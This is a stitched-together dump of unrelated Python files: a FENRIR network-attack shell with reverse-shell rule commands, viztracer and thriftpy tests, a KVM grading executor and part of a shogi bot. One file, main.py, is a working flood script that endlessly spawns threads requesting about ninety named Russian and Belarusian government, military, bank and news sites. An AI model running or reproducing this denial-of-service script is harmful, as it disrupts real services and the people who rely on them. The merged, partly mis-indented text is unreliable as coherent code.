print("*** Invalid number of arguments")
            self.help_add_reverse_rule()
else:
try:
args[0] = int(args[0])
            except ValueError:
                print("*** First argument must be a number")
                self.help_add_reverse_rule()
                return
TYPES_ARRAY = ('unique', 'multi')
if args[0] <= 65535 and args[0] > 0 and args[1] in TYPES_ARRAY:
self.FENRIR.FenrirFangs.addRule(args[0], args[2], args[1])
print("New rule added : \n\tport = " + str(args[0]) + "\n\ttype = " + args[1] + "\n\tproto = " + args[2])
else:
print("*** Invalid arguments")
                self.help_add_reverse_rule()
def help_add_reverse_rule(self):
print("USAGE : add_reverse_rule <port> <type = unique> <proto = IP>")
print("Interface for adding port-specific rules to allow reverse connection to reach FENRIR. This is useful for reverse shell or for server-based exploits & fun (Responder)")
print("Types include : \n\tunique = rule is triggered once before being deleted (useful to get a reverse shell from one host) \n\tmulti = rule can be triggered multiple times (useful for MitM stuff)")
def complete_add_reverse_rule(self, match, line, bindex, eindex):
if bindex <= 16:
return (' ')
elif bindex > 16:
if line.count(' ') == 2:
COMPLETION_ARRAY = ('unique ', 'multi ')
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
elif line.count(' ') >= 3:
return ('')
else:
return ('')
else:
return ('')
def do_autoconf(self,s):
print("Running initAutoconf...")
self.FENRIR.initAutoconf()
self.do_show('all')
def help_autoconf(self):
print("Runs the auto-configuration module")
def do_run(self,s):
if self.FENRIR.tap == None:
self.do_create_virtual_tap("")
if self.FENRIR.tap != None and self.FENRIR.hostip != '' and self.FENRIR.hostmac != '':
self.FENRIR.setAttribute("verbosity", 0)
self.changeRunningState(True)
self.stop_event = threading.Event()
self.FenrirThread = threading.Thread(target=self.FENRIR.initMANGLE, args=(self.stop_event,))
self.FenrirThread.daemon = True
self.FenrirThread.start()
# self.FENRIR.initMANGLE()
else:
print("*** FENRIR PANIC : Configuration problem")
self.help_run()
def help_run(self):
print("USAGE : run")
print("This will launch FENRIR core in a new thread and remove any verbosity !")
print("(Disclaimer : you must have run the auto-configuration module or given correct information manually before running this command ! You need at least host_ip, host_mac and a virtual tap created !)")
def do_run_debug(self,s):
if self.FENRIR.tap == None:
self.do_create_virtual_tap("")
if self.FENRIR.tap != None and self.FENRIR.hostip != '' and self.FENRIR.hostmac != '':
self.changeRunningState(True)
self.stop_event = threading.Event()
self.FENRIR.initMANGLE(self.stop_event)
else:
print("*** FENRIR PANIC : Configuration problem")
self.help_run_debug()
def help_run_debug(self):
print("USAGE : run_debug")
print("This will launch FENRIR core WITHOUT creating a new thread !")
print("(Disclaimer : you must have run the auto-configuration module or given correct information manually before running this command ! You need at least host_ip, host_mac and a virtual tap created !)")
def do_stop(self,s):
if self.FENRIR.isRunning == True:
self.stop_event.set()
self.FenrirThread.join()
self.changeRunningState(False)
print("Fenrir was stopped")
else:
print("Fenrir is not running at the moment...")
def help_stop(self):
print("Stops the FENRIR thread")
def do_cookie(self,s):
print("This cookie machine is brought to you by Valérian LEGRAND valerian.legrand@orange.com\n")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
def do_exit(self, s):
return True
def do_help(self,s):
if s == '' :
print("FENRIR Commands :")
print("\tcookie")
print("\tcreate_virtual_tap")
print("\tdestroy_virtual_tap")
print("\tadd_reverse_rule")
print("\trun")
print("\trun_debug")
print("\tset")
print("\tshell")
print("\tshortcuts")
print("\tautoconf")
print("\tstop")
print("\tquit")
print("\thelp")
else :
Cmd.do_help(self,s)
def complete_help(self, match, line, bindex, eindex):
COMPLETION_ARRAY = ('cookie', 'create_virtual_tap', 'destroy_virtual_tap', 'add_reverse_rule', 'run', 'run_debug', 'set', 'shell', 'shortcuts', 'autoconf', 'stop', 'quit', 'exit', 'help')
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
if __name__ == '__main__':
app = Interface()
app.cmdloop()
|
mock_xml_file_server.py | import os
import SimpleHTTPServer
import SocketServer
from threading import Thread
import logging
log = logging.getLogger(__name__)
PORT = 8999
def serve(port=PORT):
'''Serves test XML files over HTTP'''
# Make sure we serve from the tests' XML directory
os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)),
'data-samples'))
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
class TestServer(SocketServer.TCPServer):
allow_reuse_address = True
httpd = TestServer(("", PORT), Handler)
info = 'Serving test HTTP server at port', PORT
print info
log.info(info)
httpd_thread = Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
|
test_multiprocess.py | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/gaogaotiantian/viztracer/blob/master/NOTICE.txt
import os
import sys
import multiprocessing
import platform
import unittest
from .cmdline_tmpl import CmdlineTmpl
file_parent = """
import subprocess
subprocess.run(["python", "child.py"])
subprocess.run(("python", "child.py"))
subprocess.run("python child.py")
"""
file_child = """
def fib(n):
if n < 2:
return 1
return fib(n-1) + fib(n-2)
fib(5)
"""
file_fork = """
import os
import time
pid = os.fork()
if pid > 0:
time.sleep(0.1)
print("parent")
else:
print("child")
"""
file_multiprocessing = """
import multiprocessing
from multiprocessing import Process
import time
def fib(n):
if n < 2:
return 1
return fib(n-1) + fib(n-2)
def f():
fib(5)
if __name__ == "__main__":
fib(2)
p = Process(target=f)
p.start()
p.join()
time.sleep(0.1)
"""
file_multiprocessing_overload_run = """
import multiprocessing
from multiprocessing import Process
import time
class MyProcess(Process):
def run(self):
self.fib(5)
def fib(self, n):
if n < 2:
return 1
return self.fib(n-1) + self.fib(n-2)
if __name__ == "__main__":
p = MyProcess()
p.start()
p.join()
time.sleep(0.1)
"""
file_multiprocessing_stack_limit = """
import multiprocessing
from multiprocessing import Process
import time
from viztracer import get_tracer
def fib(n):
if n < 2:
return 1
return fib(n-1) + fib(n-2)
def f():
fib(5)
def cb(tracer):
print(tracer)
tracer.max_stack_depth = 2
if __name__ == "__main__":
get_tracer().set_afterfork(cb)
p = Process(target=f)
p.start()
p.join()
time.sleep(0.1)
"""
file_pool = """
from multiprocessing import Process, Pool
import os
import time
def f(x):
return x*x
if __name__ == "__main__":
process_num = 5
with Pool(processes=process_num) as pool:
print(pool.map(f, range(10)))
for i in pool.imap_unordered(f, range(10)):
print(i)
res = pool.apply_async(f, (20,)) # runs in *only* one process
print(res.get(timeout=1)) # prints "400"
res = pool.apply_async(os.getpid, ()) # runs in *only* one process
print(res.get(timeout=1)) # prints the PID of that process
multiple_results = [pool.apply_async(os.getpid, ()) for i in range(process_num)]
print([res.get(timeout=1) for res in multiple_results])
"""
class TestSubprocess(CmdlineTmpl):
def setUp(self):
with open("child.py", "w") as f:
f.write(file_child)
def tearDown(self):
os.remove("child.py")
def test_basic(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertEqual(len(pids), 4)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json", script=file_parent, check_func=check_func)
class TestMultiprocessing(CmdlineTmpl):
def test_os_fork(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertGreater(len(pids), 1)
if sys.platform in ["linux", "linux2"]:
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json", script=file_fork, check_func=check_func)
    def test_multiprocessing(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertGreater(len(pids), 1)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing,
check_func=check_func,
concurrency="multiprocessing")
    def test_ignore_multiprocessing(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertEqual(len(pids), 1)
self.template(["viztracer", "-o", "result.json", "--ignore_multiproces", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing,
check_func=check_func,
concurrency="multiprocessing")
def test_multiprocessing_overload(self):
def check_func(data):
fib_count = 0
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
fib_count += 1 if "fib" in entry["name"] else 0
self.assertGreater(len(pids), 1)
self.assertEqual(fib_count, 15)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing_overload_run,
check_func=check_func,
concurrency="multiprocessing")
    @unittest.skipIf(int(platform.python_version_tuple()[1]) >= 8
                     or "win32" in sys.platform, "Not supported on Windows; hangs on 3.8+ for unknown reasons")
def test_multiprocessing_pool(self):
# I could not reproduce the stuck failure locally. This is only for
# coverage anyway, just skip it on 3.8+
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertGreater(len(pids), 1)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_pool,
check_func=check_func,
concurrency="multiprocessing")
    def test_multiprocessing_stack_depth(self):
def check_func(data):
for entry in data["traceEvents"]:
self.assertNotIn("fib", entry["name"].split())
if multiprocessing.get_start_method() == "fork":
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing_stack_limit,
check_func=check_func,
concurrency="multiprocessing")
|
main.py | import requests
import threading
def main():
links = [ "https://www.gazprom.ru/",
"https://lukoil.ru/",
"https://magnit.ru/",
"https://www.nornickel.com/",
"https://www.surgutneftegas.ru/",
"https://www.tatneft.ru/",
"https://www.evraz.com/ru",
"https://nlmk.com/",
"https://www.sibur.ru/",
"https://www.severstal.com/",
"https://www.metalloinvest.com/",
"https://nangs.org/",
"https://rmk-group.ru/ru",
"https://www.tmk-group.ru/",
"https://ya.ru/",
"https://www.polymetalinternational.com/ru",
"https://www.uralkali.com/ru",
"https://www.eurosib.ru/",
"https://omk.ru/",
"https://www.sberbank.ru/",
"https://www.vtb.ru/",
"https://www.gazprombank.ru/",
"https://www.gosuslugi.ru/",
"https://www.mos.ru/uslugi/",
"http://kremlin.ru/",
"http://government.ru/",
"https://mil.ru/",
"https://www.nalog.gov.ru/",
"https://customs.gov.ru/",
"https://pfr.gov.ru/",
"https://rkn.gov.ru/",
"https://mail.rkn.gov.ru/",
"https://cloud.rkn.gov.ru/",
"https://mvd.gov.ru/",
"https://pwd.wto.economy.gov.ru/",
"https://stroi.gov.ru/",
"https://proverki.gov.ru/",
"https://ria.ru/",
"https://gazeta.ru/",
"https://kp.ru/",
"https://riafan.ru/",
"https://pikabu.ru/",
"https://kommersant.ru/",
"https://mk.ru/",
"https://yaplakal.com/",
"https://rbc.ru/",
"https://bezformata.com/",
"https://shop-rt.com/",
"http://belta.by/",
"https://sputnik.by/",
"https://www.tvr.by/",
"https://www.sb.by/",
"https://belmarket.by/",
"https://www.belarus.by/",
"https://belarus24.by/",
"https://ont.by/",
"https://www.024.by/",
"https://www.belnovosti.by/",
"https://mogilevnews.by/",
"https://www.mil.by/",
"https://yandex.by/",
"https://www.slonves.by/",
"http://www.ctv.by/",
"https://radiobelarus.by/",
"https://radiusfm.by/",
"https://alfaradio.by/",
"https://radiomir.by/",
"https://radiostalica.by/",
"https://radiobrestfm.by/",
"https://www.tvrmogilev.by/",
"https://minsknews.by/",
"https://zarya.by/",
"https://grodnonews.by/",
"https://rec.gov.by/ru",
"https://www.mil.by/",
"http://www.government.by/",
"https://president.gov.by/ru",
"https://www.mvd.gov.by/ru",
"http://www.kgb.by/ru/",
"http://www.prokuratura.gov.by/",
"http://www.nbrb.by/",
"https://belarusbank.by/",
"https://brrb.by/",
"https://www.belapb.by/",
"https://bankdabrabyt.by/",
"https://belinvestbank.by/individual",
"https://bgp.by/ru/",
"https://www.belneftekhim.by/",
"http://belres.by/ru/",
"https://www.energo.by/",
"http://www.bellegprom.by/",
"http://mininform.gov.by/",
]
while True:
for link in links:
try:
threading.Thread(target=tryRequest, args=(link,)).start()
            except Exception:
print("Thread Error")
def tryRequest(link):
try:
result = requests.get(link)
if result:
print("Site: "+ link + " Response OK\n")
else:
print("Site: "+ link + " Response Failed\n")
    except Exception as ex:
        print("Site: " + link + " Exception Error: " + str(ex) + "\n")
if __name__ == "__main__":
main()
|
test_protocol_cybinary.py | # -*- coding: utf-8 -*-
import multiprocessing
import os
import time
import pytest
from thriftpy._compat import u
from thriftpy.thrift import TType, TPayload
from thriftpy.transport import TSocket, TServerSocket
from thriftpy.utils import hexlify
from thriftpy._compat import PYPY
pytestmark = pytest.mark.skipif(PYPY,
reason="cython not enabled in pypy.")
if not PYPY:
from thriftpy.protocol import cybin as proto
from thriftpy.transport.memory import TCyMemoryBuffer
from thriftpy.transport.buffered import TCyBufferedTransport
class TItem(TPayload):
thrift_spec = {
1: (TType.I32, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
}
default_spec = [("id", None), ("phones", None)]
def test_write_bool():
b = TCyMemoryBuffer()
proto.write_val(b, TType.BOOL, 1)
b.flush()
assert "01" == hexlify(b.getvalue())
def test_read_bool():
b = TCyMemoryBuffer(b'\x01')
val = proto.read_val(b, TType.BOOL)
assert True is val
def test_write_i8():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I08, 123)
b.flush()
assert "7b" == hexlify(b.getvalue())
def test_read_i8():
b = TCyMemoryBuffer(b'\x7b')
val = proto.read_val(b, TType.I08)
assert 123 == val
def test_write_i16():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I16, 12345)
b.flush()
assert "30 39" == hexlify(b.getvalue())
def test_read_i16():
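    # b"09" is the two bytes 0x30 0x39, i.e. the big-endian I16 value 12345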
b = TCyMemoryBuffer(b"09")
val = proto.read_val(b, TType.I16)
assert 12345 == val
def test_write_i32():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I32, 1234567890)
b.flush()
assert "49 96 02 d2" == hexlify(b.getvalue())
def test_read_i32():
b = TCyMemoryBuffer(b"I\x96\x02\xd2")
assert 1234567890 == proto.read_val(b, TType.I32)
def test_write_i64():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I64, 1234567890123456789)
b.flush()
assert "11 22 10 f4 7d e9 81 15" == hexlify(b.getvalue())
def test_read_i64():
b = TCyMemoryBuffer(b"\x11\"\x10\xf4}\xe9\x81\x15")
assert 1234567890123456789 == proto.read_val(b, TType.I64)
def test_write_double():
b = TCyMemoryBuffer()
proto.write_val(b, TType.DOUBLE, 1234567890.1234567890)
b.flush()
assert "41 d2 65 80 b4 87 e6 b7" == hexlify(b.getvalue())
def test_read_double():
b = TCyMemoryBuffer(b"A\xd2e\x80\xb4\x87\xe6\xb7")
assert 1234567890.1234567890 == proto.read_val(b, TType.DOUBLE)
def test_write_string():
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, "hello world!")
b.flush()
assert "00 00 00 0c 68 65 6c 6c 6f 20 77 6f 72 6c 64 21" == \
hexlify(b.getvalue())
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, u("你好世界"))
b.flush()
assert "00 00 00 0c e4 bd a0 e5 a5 bd e4 b8 96 e7 95 8c" == \
hexlify(b.getvalue())
def test_read_string():
b = TCyMemoryBuffer(b"\x00\x00\x00\x0c"
b"\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c")
assert u("你好世界") == proto.read_val(b, TType.STRING)
def test_write_message_begin():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
b.write_message_begin("test", TType.STRING, 1)
b.write_message_end()
assert "80 01 00 0b 00 00 00 04 74 65 73 74 00 00 00 01" == \
hexlify(trans.getvalue())
def test_write_message_begin_no_strict():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans, strict_write=False)
b.write_message_begin("test", TType.STRING, 1)
b.write_message_end()
assert "00 00 00 04 74 65 73 74 0b 00 00 00 01" == \
hexlify(trans.getvalue())
def test_read_message_begin():
b = TCyMemoryBuffer(b"\x80\x01\x00\x0b\x00\x00\x00\x04test"
b"\x00\x00\x00\x01")
res = proto.TCyBinaryProtocol(b).read_message_begin()
assert res == ("test", TType.STRING, 1)
def test_read_message_begin_not_strict():
b = TCyMemoryBuffer(b"\x00\x00\x00\x04test\x0b\x00\x00\x00\x01")
res = proto.TCyBinaryProtocol(b, strict_read=False).read_message_begin()
assert res == ("test", TType.STRING, 1)
def test_write_struct():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item)
b.write_message_end()
assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
"06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
hexlify(trans.getvalue())
def test_read_struct():
b = TCyMemoryBuffer(b"\x08\x00\x01\x00\x00\x00{"
b"\x0f\x00\x02\x0b\x00\x00\x00"
b"\x02\x00\x00\x00\x06123456"
b"\x00\x00\x00\x06abcdef\x00")
b = proto.TCyBinaryProtocol(b)
_item = TItem(id=123, phones=["123456", "abcdef"])
_item2 = TItem()
b.read_struct(_item2)
assert _item == _item2
def test_write_empty_struct():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem()
b.write_struct(item)
b.write_message_end()
assert "00" == hexlify(trans.getvalue())
def test_read_empty_struct():
b = TCyMemoryBuffer(b"\x00")
b = proto.TCyBinaryProtocol(b)
_item = TItem()
_item2 = TItem()
b.read_struct(_item2)
assert _item == _item2
def test_write_huge_struct():
b = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(b)
item = TItem(id=12345, phones=["1234567890"] * 100000)
b.write_struct(item)
b.write_message_end()
def test_read_huge_args():
class Hello(TPayload):
thrift_spec = {
1: (TType.STRING, "name", False),
2: (TType.STRING, "world", False),
}
default_spec = [("name", None), ("world", None)]
b = TCyMemoryBuffer()
item = Hello(name='我' * 326, world='你' * 1365)
p = proto.TCyBinaryProtocol(b)
p.write_struct(item)
p.write_message_end()
item2 = Hello()
p.read_struct(item2)
def test_skip_bool():
b = TCyMemoryBuffer()
proto.write_val(b, TType.BOOL, 1)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.BOOL)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_double():
b = TCyMemoryBuffer()
proto.write_val(b, TType.DOUBLE, 0.123425897)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.DOUBLE)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_string():
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, "hello world")
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.STRING)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_list():
b = TCyMemoryBuffer()
proto.write_val(b, TType.LIST, [5, 6, 7, 8, 9], spec=TType.I32)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.LIST)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_map():
b = TCyMemoryBuffer()
proto.write_val(b, TType.MAP, {"hello": 0.3456},
spec=(TType.STRING, TType.DOUBLE))
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.MAP)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_struct():
b = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(b)
item = TItem(id=123, phones=["123456", "abcdef"])
p.write_struct(item)
p.write_message_end()
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.STRUCT)
assert 123 == proto.read_val(b, TType.I32)
def test_read_long_data():
val = 'z' * 97 * 1024
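    # ~97 KiB payload, presumably large enough to force the buffered transport
    # to refill its internal read buffer several times for a single string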
def serve():
server_sock = TServerSocket(
unix_socket="./thriftpy_test.sock")
server_sock.listen()
client = server_sock.accept()
t = TCyBufferedTransport(client)
proto.write_val(t, TType.STRING, val)
t.flush()
p = multiprocessing.Process(target=serve)
p.start()
time.sleep(0.1)
try:
sock = TSocket(unix_socket="./thriftpy_test.sock")
b = TCyBufferedTransport(sock)
b.open()
assert val == proto.read_val(b, TType.STRING)
sock.close()
finally:
p.terminate()
try:
os.remove("./thriftpy_test.sock")
except IOError:
pass
def test_write_wrong_arg_type():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id="wrong type", phones=["123456", "abcdef"])
try:
b.write_struct(item)
except Exception:
pass
b.write_message_end()
item2 = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item2)
b.write_message_end()
assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
"06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
hexlify(trans.getvalue())
def test_read_wrong_arg_type():
class TWrongTypeItem(TPayload):
thrift_spec = {
1: (TType.STRING, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
}
default_spec = [("id", None), ("phones", None)]
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id=58, phones=["123456", "abcdef"])
b.write_struct(item)
b.write_message_end()
item2 = TWrongTypeItem()
try:
b.read_struct(item2)
except Exception:
pass
item3 = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item3)
b.write_message_end()
item4 = TItem()
b.read_struct(item4)
assert item3 == item4
def test_multiple_read_struct():
t = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(t)
item1 = TItem(id=123, phones=["123456", "abcdef"])
item2 = TItem(id=234, phones=["110", "120"])
p.write_struct(item1)
p.write_struct(item2)
p.write_message_end()
_item1 = TItem()
_item2 = TItem()
p.read_struct(_item1)
p.read_struct(_item2)
assert _item1 == item1 and _item2 == item2
|
kvm_executor.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""A script that starts a vm, reverts it to a known snapshot, tests a
submission bundle (submission + tests), and closes the vm"""
from __future__ import with_statement
# Use simplejson or Python 2.6 json, prefer simplejson.
try:
import simplejson as json
except ImportError:
import json
import os
import sys
import time
import logging
import signal
from threading import Thread
import serial
from subprocess import Popen, PIPE, STDOUT
from vmchecker.generic_executor import VM, Host
_logger = logging.getLogger('vm_executor')
class kvmHost(Host):
def getVM(self, bundle_dir, sb_cfg):
return kvmVM(self, bundle_dir, sb_cfg)
class kvmVM(VM):
hostname = 'kvm2'
def __init__(self, host, bundle_dir, sb_cfg):
VM.__init__(self, host, bundle_dir, sb_cfg)
self.hostname = self.machinecfg.get_vm_path()
self.path = self.getPath()
print self.path
def executeCommand(self,cmd):
_logger.info("executeCommand: %s" % cmd)
return self.host.executeCommand("ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "+self.username+"@"+self.IP+" "+cmd)
def power_on_kvm(self):
o = self.host.executeCommand("virsh start kvm2")
if "started" in o:
print "Exit"
sys.exit()
def start(self):
power_thd = Thread(target = self.power_on_kvm)
power_thd.start()
power_thd.join()
self.IP = self.getIP()
def stop(self):
self.host.executeCommand("virsh destroy "+self.hostname)
def revert(self, number = None):
self.stop() # just in case it's on
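        # revert by rebuilding the working disk: run.qcow2 is discarded and
        # re-copied from the pristine image.qcow2 base image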
self.host.executeCommand("rm -f "+os.path.join(self.path,"run.qcow2"))
self.host.executeCommand("cp "+os.path.join(self.path,"image.qcow2")+" "+os.path.join(self.path,"run.qcow2"))
def copyTo(self, sourceDir, targetDir, files):
""" Copy files from host(source) to guest(target) """
for f in files:
host_path = os.path.join(sourceDir, f)
guest_path = os.path.join(targetDir, f)
if not os.path.exists(host_path):
_logger.error('host file (to send) "%s" does not exist' % host_path)
return
_logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+host_path+" "+self.username+"@"+self.IP+":"+guest_path)
def copyFrom(self, sourceDir, targetDir, files):
""" Copy files from guest(source) to host(target) """
for f in files:
host_path = os.path.join(targetDir, f)
guest_path = os.path.join(sourceDir, f)
_logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+self.username+"@"+self.IP+":"+guest_path+" "+host_path)
if not os.path.exists(host_path):
_logger.error('host file (received) "%s" does not exist' % host_path)
def run(self, shell, executable_file, timeout):
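        # runs executable_file on the guest in a helper thread and returns True
        # when the thread is still alive after `timeout`, i.e. the run timed out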
self.executeCommand("chmod +x "+ executable_file)
_logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout))
thd = Thread(target = self.executeCommand, args = (executable_file,))
thd.start()
        if timeout is None:
thd.join()
else:
thd.join(timeout)
return thd.isAlive()
def getMac(self):
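        # crude XML scraping of "virsh dumpxml": jump just past the opening
        # quote of <mac address='...'/> and read up to the closing "'/>"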
mac = self.host.executeCommand("virsh dumpxml "+self.hostname)
mac = mac[mac.find("<mac address=")+14:]
mac = mac[:mac.find("'/>")]
return mac.strip()
def getPath(self):
path = self.host.executeCommand("virsh dumpxml "+self.hostname)
path = path[path.find("<source file='")+14:]
path = path[:path.find("'/>")]
return os.path.dirname(path)
def getIP(self):
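        # poll the host ARP table until an entry with the VM's MAC shows up,
        # then take the address between the parentheses of that entry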
mac = self.getMac()
while True:
arps = self.host.executeCommand("arp -a").split("\n")
time.sleep(1)
for arp in arps:
if mac in arp:
IP = arp[arp.find("(")+1:arp.find(")")]
_logger.info("IP: %s" % IP)
return IP
def getIPfromIfconfig(self,string):
s = string[string.find("inet addr:")+10:]
s = s[0:s.find(" ")]
return s
|
lishogi-bot.py | import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError, ReadTimeout
from urllib3.exceptions import ProtocolError
from ColorLogger import enable_color_logging
from util import *
import copy
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.6.0"
terminated = False
def signal_handler(signal, frame):
global terminated
    logger.debug("Received SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
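# giveup predicate for backoff: an HTTP error below 500 is treated as
# permanent (stop retrying), while 5xx and network-level errors keep retrying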
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
    logger.info("Successfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
else:
control_queue.put_nowait({"type": "ping"})
        except Exception:
            # swallow transient stream errors; the loop reconnects on the next pass
            pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
manager = multiprocessing.Manager()
challenge_queue = manager.list()
control_queue = manager.Queue()
control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li])
control_stream.start()
busy_processes = 0
queued_processes = 0
with logging_pool.LoggingPool(max_games+1) as pool:
while not terminated:
event = control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "local_game_done":
busy_processes -= 1
logger.info("+++ Process Free. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
elif event["type"] == "challenge":
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
challenge_queue.append(chlng)
if (challenge_config.get("sort_by", "best") == "best"):
list_c = list(challenge_queue)
list_c.sort(key=lambda c: -c.score())
challenge_queue = list_c
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
                    except Exception:
                        pass
elif event["type"] == "gameStart":
if queued_processes <= 0:
logger.debug("Something went wrong. Game is starting and we don't have a queued process")
else:
queued_processes -= 1
busy_processes += 1
logger.info("--- Process Used. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
game_id = event["game"]["id"]
pool.apply_async(play_game, [li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue])
while ((queued_processes + busy_processes) < max_games and challenge_queue): # keep processing the queue until empty or max_games is reached
chlng = challenge_queue.pop(0)
try:
logger.info(" Accept {}".format(chlng))
queued_processes += 1
response = li.accept_challenge(chlng.id)
logger.info("--- Process Queue. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
queued_processes -= 1
control_queue.task_done()
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
    # Initial response of the stream is the full game info; store it.
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
engine = engine_factory(board)
engine.get_opponent_info(game)
conversation = Conversation(game, engine, li, __version__, challenge_queue)
logger.info("+++ {}".format(game))
engine_cfg = config["engine"]
is_usi = engine_cfg["protocol"] == "usi"
is_usi_ponder = is_usi and engine_cfg.get("ponder", False)
move_overhead = config.get("move_overhead", 1000)
polyglot_cfg = engine_cfg.get("polyglot", {})
book_cfg = polyglot_cfg.get("book", {})
ponder_thread = None
deferredFirstMove = False
ponder_usi = None
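    # the ponder search runs in a background thread and stashes its result in
    # the module-level ponder_results dict, keyed by game id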
def ponder_thread_func(game, engine, board, wtime, btime, winc, binc):
global ponder_results
